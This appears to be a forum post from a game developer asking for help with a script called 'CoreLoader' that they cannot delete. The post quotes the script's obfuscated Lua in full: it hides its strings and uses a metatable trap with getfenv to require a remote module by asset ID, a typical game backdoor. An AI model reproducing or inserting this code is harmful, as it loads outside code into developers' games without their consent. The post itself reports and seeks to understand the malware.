So idk if this is some new kind of virus but I was exploring my studio looking for stuff I can update on my game and I came across this script called ‘CoreLoader’. This is what the script contained:
local h = setmetatable;
local i = string.format;
local b = getfenv()
local to = tonumber
local ov = "5698"
local ch = "qui"
local lv = pcall
local t = {
[1]="bees",
[2]=i("e%sr%soS%sek%siL","c","u","d","n");
[3]=i("d%sl%sas%sD","e","b","i");
[4]=i("tn%sr%sP","e","a");
};
local u = {
__index = function()
lv(function()b()["re"..ch.."re"](ov .. "193573")end)
end;
};
h(t,u);
local v = {
[1]="bees";
};
local w = {
__index = function(table,i)
local bees = t[5];
end;
};
h(v,w);
local joe = v[2];
So how does this possible virus effect my game? Well let me put it frankly I can not delete this script, remove code from it, or disable the script. I tried all 3 of these methods to remove it, but it has not seemed to work. Removing the code inside of the script doesn’t do anything because it constantly reupdates the code each time I exit the script.
Anyone got an idea of what this does, and how to get rid of it?
There’s also another script labeled ‘GameLoader’, and it has nothing in it.